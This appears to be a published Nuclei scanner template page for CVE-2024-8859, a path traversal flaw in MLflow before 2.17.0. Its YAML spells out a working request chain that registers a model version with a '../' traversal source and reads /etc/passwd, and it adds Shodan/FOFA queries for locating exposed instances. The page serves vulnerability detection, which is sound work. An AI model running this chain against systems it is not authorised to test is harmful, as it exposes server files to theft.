Mlflow < 2.17.0 - Local File Inclusion
ID: CVE-2024-8859
Severity: critical
Author: gy741
Tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
Description
Section titled “Description”Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2024-8859
info: name: Mlflow < 2.17.0 - Local File Inclusion author: gy741 severity: critical description: | Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability. reference: - https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb - https://github.com/mlflow/mlflow/pull/13161 - https://nvd.nist.gov/vuln/detail/CVE-2024-8859 metadata: max-request: 7 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" fofa-query: - title="mlflow" - app="mlflow" tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
http: - raw: - | POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "dbfs:/"}
- | POST /api/2.0/mlflow/runs/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- | POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1 Host: {{Hostname}}
whatever
- | POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- | POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name": "{{randstr}}"}
- | POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
- | GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200
extractors: - type: json part: body_1 name: EXPERIMENT_ID group: 1 json: - '.experiment_id' internal: true
- type: json part: body_2 name: RUN_ID group: 1 json: - '.run.info.run_id' internal: true# digest: 4a0a00473045022100c9b38a094a26c385c163ac0582ea3276abe7320dd48bcc916bdcf22d137a31fc0220278e2485ef2971367fabcfd98de6ea1ceb58dbeb28831d2f04c81387dee925b2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8859.yaml"